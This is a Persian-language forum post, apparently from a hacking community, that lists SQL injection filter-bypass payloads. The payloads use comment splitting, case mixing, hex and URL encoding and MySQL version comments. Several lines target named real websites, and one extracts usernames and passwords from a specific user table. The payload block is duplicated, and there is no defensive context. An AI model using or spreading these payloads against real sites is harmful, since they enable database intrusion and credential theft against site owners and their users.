سلام خدمت دوستان گل و اساتید عزیز
این تاپیک اختصاص داره به بایپس های مفید و موثر در حملات SQL injection
با آرزوی موفقیت برای همه
[php]
http://www.site.com/index.php?id=-4 and (select 1)%20= (select 0x414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 ) union all select 1*2*version()*4*5*6*7*8*9*10*11*12*13*14*15*16*17* 18*19*20*21*22*23--
================================================== ===============
http://www.asite.com/index.php?id=-4 and (select 1) = (select 2) 0union all select 1*2*version()*4*5*6*7*8*9*10*11*12*13*14*15*16*17* 18*19*20*21*22*23--
================================================== ===============
http://www.site.com/index.php?id=-4/**/union/**/all/*!50000select*/1*2*3*4*5*6*7*8*9*10*11*12*13*14*15/**/
================================================== ================
http://www.site.com/index.php?id=-4/**/union/**/Select/**/0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0/**/
================================================== ================
http://www.site.com/index.php?id=-4/**/union/**/select*/1*2*3*4*5*6*7*8*9*10*11*12*13*14*15*16*17*18*19*20 *21*22*23/**/
================================================== =================
http://www.site.com/index.php?id=-4/**/union/**/select*/(0x312c322c332c342c352c362c372c382c392c31302c31312 c31322c31332c31342c31352c31362c31372c31382c31392c3 2302c32312c32322c3233)/**/
================================================== =================
http://www.asite.com/index.php?id=-4+union+(select+ 1*2*3*4*5*6*7*8*9*10*11*12*13*14*15*16*17*18*19*20 *21*22*23)--
================================================== =================
UN / ** / ION / ** / SE / ** /
LECT / ** / user* password from users
================================================== =================
http://Target.com/news.php?id=-999+/*!union+select+1*group_concat(table_name)*3*4*5*6* 7+from+information_schema.tables+where+table_schem a=database()*/--
================================================== =================
http://www.1station.com.my/sport.php?id=19+/**/+OrDeR+/**/+bY+/**/+1--
================================================== ==================
http://almasa-group.com/products.php?pro_id=-43+/**/+Union/*!select*/1*2*3*4*5--
================================================== ===================
http://almasa-group.com/products.php?pro_id=-43+/*!uniOn+seLect+1*2*3*4*group_concat(user_name*0x3a *user_password)+FROM almasag_copp1.cpg_users*/+--+
================================================== ===================
http://www.site.com/index.php?id=4/**/+UnIon/**/+SeLecT/**/+1*2*3*4*5*6*7*8*9*10*11*12*13*14*15*16*17*18*19*2 0*21*22*23--
================================================== ===================
http://www.designsbyjasmine.com/category_list.php?category_id=-999+/*!union*/+select+1*table_name*3*4*5*6*7+from+information_sc hema./*!tables*/--
[/php]
اینم چندتا دیگه
[php]
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+'UnI''On'+'SeL''ECT'
id=1+%55nion all /*!12345%53elect*/ 1*version()*3—
id=1+UnIoN+SeLecT 1*2*3—
id=1+UnIOn/**/SeLect 1*2*3—
id=1+UNIunionON+SELselectECT 1*2*3—
id=1+/*!UnIOn*/+/*!sElEcT*/ 1*2*3—
id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1*2*3—
id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1*2 *3—
id=1+un/**/ion+sel/**/ect+1*2*3--
id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1*2*3
id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
id=1+/**/union/*&id=*/select/*&id=*/1*2*3--
[/php]
یه مورد خیلی تخصصی...
[php]
(0)union(select(table_name)*column_name*…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
[/php]
این تاپیک اختصاص داره به بایپس های مفید و موثر در حملات SQL injection
با آرزوی موفقیت برای همه
[php]
http://www.site.com/index.php?id=-4 and (select 1)%20= (select 0x414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141 ) union all select 1*2*version()*4*5*6*7*8*9*10*11*12*13*14*15*16*17* 18*19*20*21*22*23--
================================================== ===============
http://www.asite.com/index.php?id=-4 and (select 1) = (select 2) 0union all select 1*2*version()*4*5*6*7*8*9*10*11*12*13*14*15*16*17* 18*19*20*21*22*23--
================================================== ===============
http://www.site.com/index.php?id=-4/**/union/**/all/*!50000select*/1*2*3*4*5*6*7*8*9*10*11*12*13*14*15/**/
================================================== ================
http://www.site.com/index.php?id=-4/**/union/**/Select/**/0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0/**/
================================================== ================
http://www.site.com/index.php?id=-4/**/union/**/select*/1*2*3*4*5*6*7*8*9*10*11*12*13*14*15*16*17*18*19*20 *21*22*23/**/
================================================== =================
http://www.site.com/index.php?id=-4/**/union/**/select*/(0x312c322c332c342c352c362c372c382c392c31302c31312 c31322c31332c31342c31352c31362c31372c31382c31392c3 2302c32312c32322c3233)/**/
================================================== =================
http://www.asite.com/index.php?id=-4+union+(select+ 1*2*3*4*5*6*7*8*9*10*11*12*13*14*15*16*17*18*19*20 *21*22*23)--
================================================== =================
UN / ** / ION / ** / SE / ** /
LECT / ** / user* password from users
================================================== =================
http://Target.com/news.php?id=-999+/*!union+select+1*group_concat(table_name)*3*4*5*6* 7+from+information_schema.tables+where+table_schem a=database()*/--
================================================== =================
http://www.1station.com.my/sport.php?id=19+/**/+OrDeR+/**/+bY+/**/+1--
================================================== ==================
http://almasa-group.com/products.php?pro_id=-43+/**/+Union/*!select*/1*2*3*4*5--
================================================== ===================
http://almasa-group.com/products.php?pro_id=-43+/*!uniOn+seLect+1*2*3*4*group_concat(user_name*0x3a *user_password)+FROM almasag_copp1.cpg_users*/+--+
================================================== ===================
http://www.site.com/index.php?id=4/**/+UnIon/**/+SeLecT/**/+1*2*3*4*5*6*7*8*9*10*11*12*13*14*15*16*17*18*19*2 0*21*22*23--
================================================== ===================
http://www.designsbyjasmine.com/category_list.php?category_id=-999+/*!union*/+select+1*table_name*3*4*5*6*7+from+information_sc hema./*!tables*/--
[/php]
اینم چندتا دیگه
[php]
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+'UnI''On'+'SeL''ECT'
id=1+%55nion all /*!12345%53elect*/ 1*version()*3—
id=1+UnIoN+SeLecT 1*2*3—
id=1+UnIOn/**/SeLect 1*2*3—
id=1+UNIunionON+SELselectECT 1*2*3—
id=1+/*!UnIOn*/+/*!sElEcT*/ 1*2*3—
id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1*2*3—
id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1*2 *3—
id=1+un/**/ion+sel/**/ect+1*2*3--
id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1*2*3
id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
id=1+/**/union/*&id=*/select/*&id=*/1*2*3--
[/php]
یه مورد خیلی تخصصی...
[php]
(0)union(select(table_name)*column_name*…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
[/php]
نظر